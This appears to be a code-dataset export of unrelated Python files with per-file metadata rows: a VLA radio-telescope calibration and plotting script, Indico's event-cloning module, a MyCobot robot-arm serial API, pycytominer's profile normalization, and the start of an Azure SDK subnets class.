newintents='AMPLITUDE', append=True)
# if not os.path.exists("cont.dat"):
# raise ValueError("The cont.dat file is not in the pipeline directory.")
__rethrow_casa_exceptions = True
context = h_init()
context.set_state('ProjectSummary', 'observatory',
'Karl G. Jansky Very Large Array')
context.set_state('ProjectSummary', 'telescope', 'EVLA')
context.set_state('ProjectSummary', 'proposal_code', '11B-124')
context.set_state('ProjectSummary', 'piname', 'Adam Leroy')
try:
hifv_importdata(ocorr_mode='co', nocopy=False, vis=[myvis],
createmms='automatic', asis='Receiver CalAtmosphere',
overwrite=False)
# Hanning smoothing is turned off in the following step.
# In the case of extreme RFI, Hanning smoothing, however,
# may still be required.
# Avoid Hanning smoothing spectral lines
# hifv_hanning(pipelinemode="automatic")
# Online flags applied when importing ASDM
hifv_flagdata(intents='*POINTING*,*FOCUS*,*ATMOSPHERE*,*SIDEBAND_RATIO*, \
*UNKNOWN*, *SYSTEM_CONFIGURATION*, \
*UNSPECIFIED#UNSPECIFIED*',
flagbackup=False, scan=True, baseband=True, clip=True,
autocorr=True,
hm_tbuff='1.5int', template=True,
filetemplate="additional_flagging.txt",
online=False, tbuff=0.0,
fracspw=0.05, shadow=True, quack=True, edgespw=True)
# Add extra quack for the first 3C48 scan and scans after longer slews
# May need to be adjusted for this. Seem to need ~30 s more after online
# flags indicate
# flagdata(vis=myvis, flagbackup=False, mode='quack', scan='2',
# quackinterval=270.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='3,11,19,27,35,43,51,59,67,75,83,91,99',
# quackinterval=14.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='100',
# quackinterval=70.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='100,101',
# quackinterval=100.0)
# flagmanager(vis=myvis, mode='save', versionname="extra_quacking",
# comment="Extra long-slew quacking.")
hifv_vlasetjy(fluxdensity=-1, scalebychan=True, reffreq='1GHz', spix=0)
hifv_priorcals(tecmaps=False)
hifv_testBPdcals(weakbp=False, refantignore='')
hifv_flagbaddef(pipelinemode="automatic")
hifv_checkflag(pipelinemode="automatic")
# NOTE we need to flag HI absorption in the bandpass here
# I *think* we can run a custom bandpass cmd here and pass
# the name of the table to 'bpcaltable' in applycal
# bpcaltable = same as pipeline name
# bandpass(fillgap=# chan flagged)
# hifv_semiFinalBPdcals(weakbp=False, refantignore='',
# bpcaltable=bpcaltable)
#
hifv_semiFinalBPdcals(weakbp=False, refantignore='')
hifv_checkflag(checkflagmode='semi')
hifv_semiFinalBPdcals(weakbp=False, refantignore='')
hifv_solint(pipelinemode="automatic", refantignore='')
hifv_fluxboot(pipelinemode="automatic", refantignore='')
hifv_finalcals(weakbp=False, refantignore='')
hifv_applycals(flagdetailedsum=True, gainmap=False, flagbackup=True, flagsum=True)
# Keep the following two steps in the script if cont.dat exists.
# Otherwise we recommend to comment out the next two tasks,
# or at least remove '*TARGET*' from the hifv_targetflag call
if os.path.exists('cont.dat'):
hifv_targetflag(intents='*CALIBRATE*, *TARGET*')
hifv_statwt(pipelinemode="automatic")
else:
hifv_targetflag(intents='*CALIBRATE*')
hifv_plotsummary(pipelinemode="automatic")
hif_makeimlist(nchan=-1, calmaxpix=300, intent='PHASE,BANDPASS')
hif_makeimages(tlimit=2.0, hm_minbeamfrac=-999.0, hm_dogrowprune=True,
hm_negativethreshold=-999.0, calcsb=False, target_list={},
hm_noisethreshold=-999.0, hm_masking='none', hm_minpercentchange=-999.0,
parallel='automatic', masklimit=4, hm_lownoisethreshold=-999.0,
hm_growiterations=-999, cleancontranges=False, hm_sidelobethreshold=-999.0)
# Make a folder of products for restoring the pipeline solution
os.mkdir('products/')
hifv_exportdata(products_dir='products/')
finally:
h_save()
# Make a new directory for the imaging outputs
if not os.path.exists("image_outputs"):
os.mkdir("image_outputs")
image_files = glob("oussid*")
for fil in image_files:
shutil.move(fil, "image_outputs/")
# Now make a bunch of scan plots to make it easier to identify bad data
ms_active = myvis
# Plot the bandpasses per SPW as well
bp_folder = "finalBPcal_plots"
if not os.path.exists(bp_folder):
os.mkdir(bp_folder)
tb.open(ms_active + "/SPECTRAL_WINDOW")
nspws = tb.getcol("NAME").shape[0]
tb.close()
# Final BP cal table now includes the stage number and step
finalbpcal_name = glob(mySDM + '*.finalBPcal.tbl')
if len(finalbpcal_name) == 0:
raise ValueError("Cannot find finalBPcal table name.")
# Blindly assume we want the first name
finalbpcal_name = finalbpcal_name[0]
for ii in range(nspws):
filename = 'finalBPcal_amp_spw_' + str(ii) + '.png'
syscommand = 'rm -rf ' + filename
os.system(syscommand)
default('plotcal')
caltable = finalbpcal_name
xaxis = 'freq'
yaxis = 'amp'
poln = ''
field = ''
antenna = ''
spw = str(ii)
timerange = ''
subplot = 111
overplot = False
clearpanel = 'Auto'
iteration = ''
showflags = False
plotsymbol = 'o'
plotcolor = 'blue'
markersize = 5.0
fontsize = 10.0
showgui = False
figfile = os.path.join(bp_folder, filename)
async = False
plotcal()
for ii in range(nspws):
filename = 'finalBPcal_phase_spw_' + str(ii) + '.png'
syscommand = 'rm -rf ' + filename
os.system(syscommand)
antPlot = str(ii * 3) + '~' + str(ii * 3 + 2)
default('plotcal')
caltable = finalbpcal_name
xaxis = 'freq'
yaxis = 'phase'
poln = ''
field = ''
antenna = ''
spw = str(ii)
timerange = ''
subplot = 111
overplot = False
clearpanel = 'Auto'
iteration = ''
# plotrange=[0,0,-phaseplotmax,phaseplotmax]
showflags = False
plotsymbol = 'o'
plotcolor = 'blue'
markersize = 5.0
fontsize = 10.0
showgui = False
figfile = os.path.join(bp_folder, filename)
async = False
plotcal()
# SPWs to loop through
tb.open(os.path.join(ms_active, "SPECTRAL_WINDOW"))
spws = range(len(tb.getcol("NAME")))
nchans = tb.getcol('NUM_CHAN')
tb.close()
# Read the field names
tb.open(os.path.join(ms_active, "FIELD"))
names = tb.getcol('NAME')
numFields = tb.nrows()
tb.close()
# Intent names
tb.open(os.path.join(ms_active, 'STATE'))
intentcol = tb.getcol('OBS_MODE')
tb.close()
tb.open(ms_active)
scanNums = np.unique(tb.getcol('SCAN_NUMBER'))
field_scans = []
is_calibrator = np.empty_like(scanNums, dtype='bool')
is_all_flagged = np.empty((len(spws), len(scanNums)), dtype='bool')
for ii in range(numFields):
subtable = tb.query('FIELD_ID==%s' % ii)
field_scan = np.unique(subtable.getcol('SCAN_NUMBER'))
field_scans.append(field_scan)
# Is the intent for calibration?
scan_intents = intentcol[np.unique(subtable.getcol("STATE_ID"))]
is_calib = False
for intent in scan_intents:
if "CALIBRATE" in intent:
is_calib = True
break
is_calibrator[field_scan - 1] = is_calib
# Are any of the scans completely flagged?
for spw in spws:
for scan in field_scan:
scantable = \
tb.query("SCAN_NUMBER=={0} AND DATA_DESC_ID=={1}".format(scan,
spw))
if scantable.getcol("FLAG").all():
is_all_flagged[spw, scan - 1] = True
else:
is_all_flagged[spw, scan - 1] = False
tb.close()
# Make folder for scan plots
scan_dir = "scan_plots"
if not os.path.exists(scan_dir):
os.mkdir(scan_dir)
for spw_num in spws:
print("On SPW {}".format(spw))
# Plotting the HI spw (0) takes so so long.
# Make some simplifications to save time
if spw_num == 0:
avg_chan = "4"
else:
avg_chan = "1"
spw_folder = os.path.join(scan_dir, "spw_{}".format(spw_num))
if not os.path.exists(spw_folder):
os.mkdir(spw_folder)
else:
# Make sure any old plots are removed first.
os.system("rm {}/*.png".format(spw_folder))
for ii in range(len(field_scans)):
print("On field {}".format(names[ii]))
for jj in field_scans[ii]:
# Check if all of the data is flagged.
if is_all_flagged[spw_num, jj - 1]:
print("All data flagged in SPW {0} scan {1}"
.format(spw_num, jj))
continue
print("On scan {}".format(jj))
# Amp vs. time
default('plotms')
vis = ms_active
xaxis = 'time'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(avg_chan)
correlation = "RR,LL"
averagedata = True
avgbaseline = True
transform = False
extendflag = False
plotrange = []
title = 'Amp vs Time: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Amp vs. channel
default('plotms')
vis = ms_active
xaxis = 'chan'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(avg_chan)
avgtime = "1e8"
correlation = "RR,LL"
averagedata = True
avgbaseline = True
transform = False
extendflag = False
plotrange = []
title = 'Amp vs Chan: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_chan_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot amp vs uvdist
default('plotms')
vis = ms_active
xaxis = 'uvdist'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(4096)
avgtime = '1e8'
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Amp vs UVDist: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_uvdist_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Skip the phase plots for the HI SPW (0)
if is_calibrator[jj - 1] and spw_num != 0:
# Plot phase vs time
default('plotms')
vis = ms_active
xaxis = 'time'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs Time: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot phase vs channel
default('plotms')
vis = ms_active
xaxis = 'chan'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs Chan: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_chan_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot phase vs uvdist
default('plotms')
vis = ms_active
xaxis = 'uvdist'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
avgchannel = "4096"
avgtime = '1e8'
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs UVDist: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_uvdist_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
| 34.127789
| 94
| 0.569866
|
f170a287bd0cad698f50c76096502453b3760b50
| 6,883
|
py
|
Python
|
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | 1
|
2021-06-11T20:02:10.000Z
|
2021-06-11T20:02:10.000Z
|
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | null | null | null |
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.core import signals
from indico.core.db import db
from indico.core.db.sqlalchemy.principals import clone_principals
from indico.core.db.sqlalchemy.util.models import get_simple_column_attrs
from indico.modules.events.cloning import EventCloner
from indico.modules.events.models.events import EventType
from indico.modules.events.models.persons import EventPerson, EventPersonLink
from indico.modules.events.models.principals import EventPrincipal
from indico.modules.events.sessions import session_settings
from indico.modules.events.util import track_location_changes
from indico.util.i18n import _
class EventLocationCloner(EventCloner):
name = 'event_location'
friendly_name = _('Venue/Room')
is_default = True
@property
def is_available(self):
return self._has_content(self.old_event)
def get_conflicts(self, target_event):
if self._has_content(target_event):
return [_('The target event already has a venue/room')]
def run(self, new_event, cloners, shared_data, event_exists=False):
with db.session.no_autoflush:
self._clone_location(new_event)
db.session.flush()
def _has_content(self, event):
return event.has_location_info
def _clone_location(self, new_event):
with track_location_changes():
new_event.location_data = self.old_event.location_data
db.session.flush()
class EventPersonCloner(EventCloner):
name = 'event_persons'
friendly_name = _('Persons')
is_internal = True
is_default = True
# We do not override `is_available` as we have cloners depending
# on this internal cloner even if it won't clone anything.
def get_conflicts(self, target_event):
if target_event.persons.has_rows():
return [_('The target event already has persons')]
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = {}
with db.session.no_autoflush:
self._clone_persons(new_event)
db.session.flush()
return {'person_map': self._person_map}
def _clone_persons(self, new_event):
attrs = get_simple_column_attrs(EventPerson) | {'user'}
for old_person in self.old_event.persons:
person = EventPerson(event=new_event)
person.populate_from_attrs(old_person, attrs)
assert person not in db.session
self._person_map[old_person] = person
class EventPersonLinkCloner(EventCloner):
name = 'event_person_links'
requires = {'event_persons'}
is_default = True
@property
def friendly_name(self):
if self.old_event.type_ == EventType.lecture:
return _('Speakers')
else:
return _('Chairpersons')
@property
def is_available(self):
return self._has_content(self.old_event)
def get_conflicts(self, target_event):
if self._has_content(target_event):
if self.old_event.type_ == EventType.lecture:
return [_('The target event already has speakers')]
else:
return [_('The target event already has chairpersons')]
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = shared_data['event_persons']['person_map']
with db.session.no_autoflush:
self._clone_person_links(new_event)
db.session.flush()
def _has_content(self, event):
return bool(event.person_links)
def _clone_person_links(self, new_event):
attrs = get_simple_column_attrs(EventPersonLink)
for old_link in self.old_event.person_links:
link = EventPersonLink()
link.populate_from_attrs(old_link, attrs)
link.person = self._person_map[old_link.person]
new_event.person_links.append(link)
class EventProtectionCloner(EventCloner):
name = 'event_protection'
friendly_name = _('ACLs and protection settings')
is_default = True
uses = {'event_roles', 'registration_forms'}
def get_conflicts(self, target_event):
conflicts = []
if target_event.access_key != '':
conflicts.append(_('The target event already has an access key'))
entries = list(target_event.acl_entries)
if len(entries) != 1 or entries[0].user != target_event.creator:
conflicts.append(_('The target event already has a custom ACL'))
return conflicts
def run(self, new_event, cloners, shared_data, event_exists=False):
self._event_role_map = shared_data['event_roles']['event_role_map'] if 'event_roles' in cloners else None
self._regform_map = shared_data['registration_forms']['form_map'] if 'registration_forms' in cloners else None
with db.session.no_autoflush:
self._clone_protection(new_event)
self._clone_session_coordinator_privs(new_event)
self._clone_acl(new_event, event_exists)
self._clone_visibility(new_event)
db.session.flush()
if event_exists:
signals.acl.protection_changed.send(type(new_event), obj=new_event, mode=new_event.protection_mode,
old_mode=None)
def _clone_protection(self, new_event):
new_event.protection_mode = self.old_event.protection_mode
new_event.access_key = self.old_event.access_key
def _clone_visibility(self, new_event):
new_event.visibility = self.old_event.visibility if new_event.category == self.old_event.category else None
def _clone_session_coordinator_privs(self, new_event):
session_settings_data = session_settings.get_all(self.old_event)
session_settings.set_multi(new_event, {
'coordinators_manage_contributions': session_settings_data['coordinators_manage_contributions'],
'coordinators_manage_blocks': session_settings_data['coordinators_manage_blocks']
})
def _clone_acl(self, new_event, event_exists):
if event_exists:
acl_entries = {principal for principal in self.old_event.acl_entries if principal.user != new_event.creator}
new_event.acl_entries = clone_principals(EventPrincipal, acl_entries,
self._event_role_map, self._regform_map)
db.session.flush()
new_event.update_principal(new_event.creator, full_access=True)
else:
new_event.acl_entries = clone_principals(EventPrincipal, self.old_event.acl_entries,
self._event_role_map, self._regform_map)
| 39.786127
| 120
| 0.687346
|
67a1477652e9846e6503371dd1973d6cf79cdccc
| 10,950
|
py
|
Python
|
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | 9
|
2021-01-24T13:30:32.000Z
|
2021-05-29T01:09:38.000Z
|
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | null | null | null |
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
sys.path.append('.')
import time, serial, struct
class MyCobot():
'''MyCobot Python API
Possessed function:
power_on() :
power_off() :
get_angles() :
get_angles_of_radian() :
send_angle() :
send_angles() :
send_angles_by_radian() :
set_color() :
get_coords() :
send_coords() :
jog_angle() :
jog_coord() :
jog_stop() :
is_moving() :
pause() :
resume() :
stop() :
is_paused() :
get_speed() :
set_speed() :
'''
def __init__(self, port):
# _prot = subprocess.run(['echo -n /dev/ttyUSB*'],
# stdout=subprocess.PIPE,
# shell=True).stdout.decode('utf-8')
_prot = port
_boudrate = '115200'
_timeout = 0.1
for _ in range(5):
try:
self.serial_port = serial.Serial(_prot, _boudrate, timeout=_timeout)
break
except Exception as e:
print(e)
time.sleep(5)
continue
else:
print('Connect prot failed, eixt.')
exit(0)
def power_on(self):
self._write('fefe0210fa')
def power_off(self):
self._write('fefe0211fa')
def set_free_mode(self):
self._write('fefe0213fa')
def get_angles(self):
'''Get all angle return a list
Return:
data_list (list):
'''
command = 'fefe0220fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_angles')
return data_list
else:
return []
def get_angles_of_radian(self):
'''Get all angle return a list
Return:
data_list (list):
'''
command = 'fefe0220fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_angles_of_radian')
return data_list
else:
return []
def send_angle(self, id, degree, speed):
'''Send one angle
Args:
id (common.Angle):
degree (int):
speed (int): 0 ~100
'''
_hex = self._angle_to_hex(degree)
speed = self._complement_zero(hex(speed)[2:], digit=2)
command = 'fefe0621{}{}{}fa'.format(id, _hex, speed)
# print(command)
self._write(command)
def send_angles(self, degrees, speed):
'''Send all angles
Args:
degrees (list): example [0, 0, 0, 0, 0, 0]
speed (int): 0 ~ 100
'''
if len(degrees) != 6:
print('The lenght of degrees is not right')
return
command = 'fefe0f22'
speed = self._complement_zero(hex(speed)[2:], digit=2)
for degree in degrees:
_hex = self._angle_to_hex(degree)
# print(_hex)
command += _hex
command += '{}fa'.format(speed)
# print(command)
self._write(command)
def send_angles_by_radian(self, radians, speed):
'''Send all angles
Args:
degrees (list): example [0, 0, 0, 0, 0, 0]
speed (int): 0 ~ 100
'''
if len(radians) != 6:
print('The lenght of degrees is not right')
return
command = 'fefe0f22'
speed = self._complement_zero(hex(speed)[2:], digit=2)
for radian in radians:
# print(radian)
_hex = self._angle_to_hex(radian, is_degree=False)
# print(_hex)
command += _hex
command += '{}fa'.format(speed)
# print(command)
self._write(command)
def get_coords(self):
'''Get all coords.
Return:
data_list (list): [x, y, z, rx, ry, rz] (mm)
'''
command = 'fefe0223fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_coords')
return data_list
else:
return []
def send_coord(self, id, coord, speed):
'''Send one coord
Args:
id(common.Coord):
coord(fload):
speed(int):
'''
command = 'fefe0624'
command += id
command += self._coord_to_hex(coord)
command += self._complement_zero(hex(int(speed))[2:], digit=2)
# print(command)
self._write(command)
def send_coords(self, coords, speed, mode):
'''Send all coords
Args:
coords: [x, y, z, rx, ry, rz]
speed(int);
mode(int): 0 - angluar, 1 - linear
'''
if len(coords) != 6:
print('The lenght of coords is not right')
return
command = 'fefe1025 '
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
mode = self._complement_zero(hex(mode)[2:], digit=2)
for coord in coords:
_hex = self._coord_to_hex(coord)
command += (_hex + ' ')
command += '{}{}fa'.format(speed, mode)
# print(command)
self._write(command)
def jog_angle(self, joint_id, direction, speed):
'''Joint control
joint_id: string
direction: int [0, 1]
speed: int (0 - 100)
'''
command = 'fefe0530'
direction = hex(direction)[2:]
direction = self._complement_zero(direction, digit=2)
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
command += '{}{}{}fa'.format(joint_id, direction, speed)
self._write(command)
def jog_coord(self, coord, direction, speed):
'''Coord control
coord: string
direction: int [0, 1]
speed: int (0 - 100)
'''
command = 'fefe0532'
direction = hex(direction)[2:]
direction = self._complement_zero(direction, digit=2)
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
command += '{}{}{}fa'.format(coord, direction, speed)
self._write(command)
def jog_stop(self):
self._write('fefe0234fa')
def is_servo_enable(self):
pass
def is_all_servo_enable(self):
pass
def set_color(self, rgb):
'''Set the light color
Args:
rgs (str): example 'ff0000'
'''
command = 'fe fe 05 6a {} fa'.format(rgb)
# print(command)
self._write(command)
def is_moving(self):
command = 'fe fe 02 2b fa'
self._write(command)
data = self._read(2)
# print(data)
if not data:
return True
flag = int(data.hex(), 16)
if flag:
return True
else:
return False
def pause(self):
self._write('fe fe 02 26 fa')
def resume(self):
self._write('fe fe 02 28 fa')
def stop(self):
self._write('fe fe 02 29 fa')
def is_paused(self):
self._write('fe fe 02 27 fa')
data = self._read()
flag = int(data.hex(), 16)
return False if flag else True
def is_in_position(self, coords):
if len(coords) != 6:
print('The lenght of coords is not right')
return
command = 'fe fe 0d 2a '
for coord in coords:
_hex = self._coord_to_hex(coord)
command += (_hex + ' ')
command += 'fa'
# print(command)
self._write(command)
data = self._read()
flag = int(data.hex(), 16)
return False if flag else True
def get_speed(self):
self._write('fe fe 02 40 fa')
data = self._read()
if data:
return int(data.hex(), 16)
def set_speed(self, speed):
'''Set speed value
Args:
speed (int): 0 - 100
'''
speed = int(speed)
if not 0 <= speed <= 100:
raise Exception('speed value out of range (0 ~ 100)')
_hex = str(hex(speed))[2:]
self._write('fe fe 03 41 {} fa'.format(_hex))
def _parse_data(self, data, name):
data_list = []
data = data.hex()
data = data[-28:]
if not (data.startswith('20') and data.endswith('fa')):
return []
if name == 'get_angles':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
degree = self._hex_to_degree(_hex)
data_list.append(degree)
elif name == 'get_coords':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
_coord = self._hex_to_int(_hex) / 10.0
data_list.append(_coord)
elif name == 'get_angles_of_radian':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
_radian = self._hex_to_int(_hex) / 1000.0
data_list.append(_radian)
return (data_list)
def _hex_to_degree(self, _hex: str):
_int = self._hex_to_int(_hex)
return _int * 18 / 314
def _hex_to_int(self, _hex: str):
_int = int(_hex, 16)
if _int > 0x8000:
_int -= 0x10000
return _int
def _angle_to_hex(self, _degree: float, is_degree=True):
if is_degree:
radian = (_degree * (3140 / 180))
else:
radian = _degree * 1000
radian = int(radian)
if radian < 0:
radian += 0x10000
radian = round(radian)
s = str(hex(radian))[2:]
s = self._complement_zero(s)
return s
def _coord_to_hex(self, coord):
coord *= 10
coord = int(coord)
if coord < 0:
coord += 0x10000
s = str(hex(coord))[2:]
s = self._complement_zero(s)
return s
def _complement_zero(self, s, digit=4):
s_len = len(s)
if s_len == digit:
return s
need_len = digit - s_len
s = ''.join(['0' for _ in range(need_len)] + [s])
return s
def _write(self, data: str):
# print(data)
data = bytes.fromhex(data)
self.serial_port.write(data)
time.sleep(0.05)
def _read(self, size: int=1024):
data = self.serial_port.read(size)
return data
| 27.512563
| 84
| 0.489863
|
1b4bc775b2b1b9241b1b73f8188150e9c787496b
| 3,846
|
py
|
Python
|
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Normalize observation features based on specified normalization method
"""
import pandas as pd
from sklearn.preprocessing import StandardScaler, RobustScaler
from pycytominer.cyto_utils import (
output,
infer_cp_features,
load_profiles,
)
from pycytominer.operations import Whiten, RobustMAD
def normalize(
profiles,
features="infer",
meta_features="infer",
samples="all",
method="standardize",
output_file="none",
compression=None,
float_format=None,
whiten_center=True,
whiten_method="ZCA",
):
"""
Normalize features
Arguments:
profiles - either pandas DataFrame or a file that stores profile data
features - list of cell painting features [default: "infer"]
if "infer", then assume cell painting features are those that do not
start with "Cells", "Nuclei", or "Cytoplasm"
meta_features - if specified, then output these with specified features
[default: "infer"]
samples - string indicating which metadata column and values to use to subset
the control samples are often used here [default: 'all']
the format of this variable will be used in a pd.query() function. An
example is "Metadata_treatment == 'control'" (include all quotes)
method - string indicating how the dataframe will be normalized
[default: 'standardize']
output_file - [default: "none"] if provided, will write annotated profiles to file
if not specified, will return the annotated profiles. We recommend
that this output file be suffixed with "_normalized.csv".
compression - the mechanism to compress [default: None]
float_format - decimal precision to use in writing output file [default: None]
For example, use "%.3g" for 3 decimal precision.
whiten_center - if data should be centered before whitening transform [default: True]
(only used if method = "whiten")
whiten_method - the type of whitening normalization used [default: 'ZCA']
(only used if method = "whiten")
Return:
A normalized DataFrame
"""
# Load Data
profiles = load_profiles(profiles)
# Define which scaler to use
method = method.lower()
avail_methods = ["standardize", "robustize", "mad_robustize", "whiten"]
assert method in avail_methods, "operation must be one {}".format(avail_methods)
if method == "standardize":
scaler = StandardScaler()
elif method == "robustize":
scaler = RobustScaler()
elif method == "mad_robustize":
scaler = RobustMAD()
elif method == "whiten":
scaler = Whiten(center=whiten_center, method=whiten_method)
if features == "infer":
features = infer_cp_features(profiles)
# Separate out the features and meta
feature_df = profiles.loc[:, features]
if meta_features == "infer":
meta_features = infer_cp_features(profiles, metadata=True)
meta_df = profiles.loc[:, meta_features]
# Fit the sklearn scaler
if samples == "all":
fitted_scaler = scaler.fit(feature_df)
else:
# Subset to only the features measured in the sample query
fitted_scaler = scaler.fit(profiles.query(samples).loc[:, features])
# Scale the feature dataframe
feature_df = pd.DataFrame(
fitted_scaler.transform(feature_df),
columns=feature_df.columns,
index=feature_df.index,
)
normalized = meta_df.merge(feature_df, left_index=True, right_index=True)
if output_file != "none":
output(
df=normalized,
output_filename=output_file,
compression=compression,
float_format=float_format,
)
else:
return normalized
| 34.339286
| 89
| 0.658346
|
c96a2e5e8e6a104e7893d4f63d3d658de101e346
| 35,800
|
py
|
Python
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class SubnetsOperations(object):
"""SubnetsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
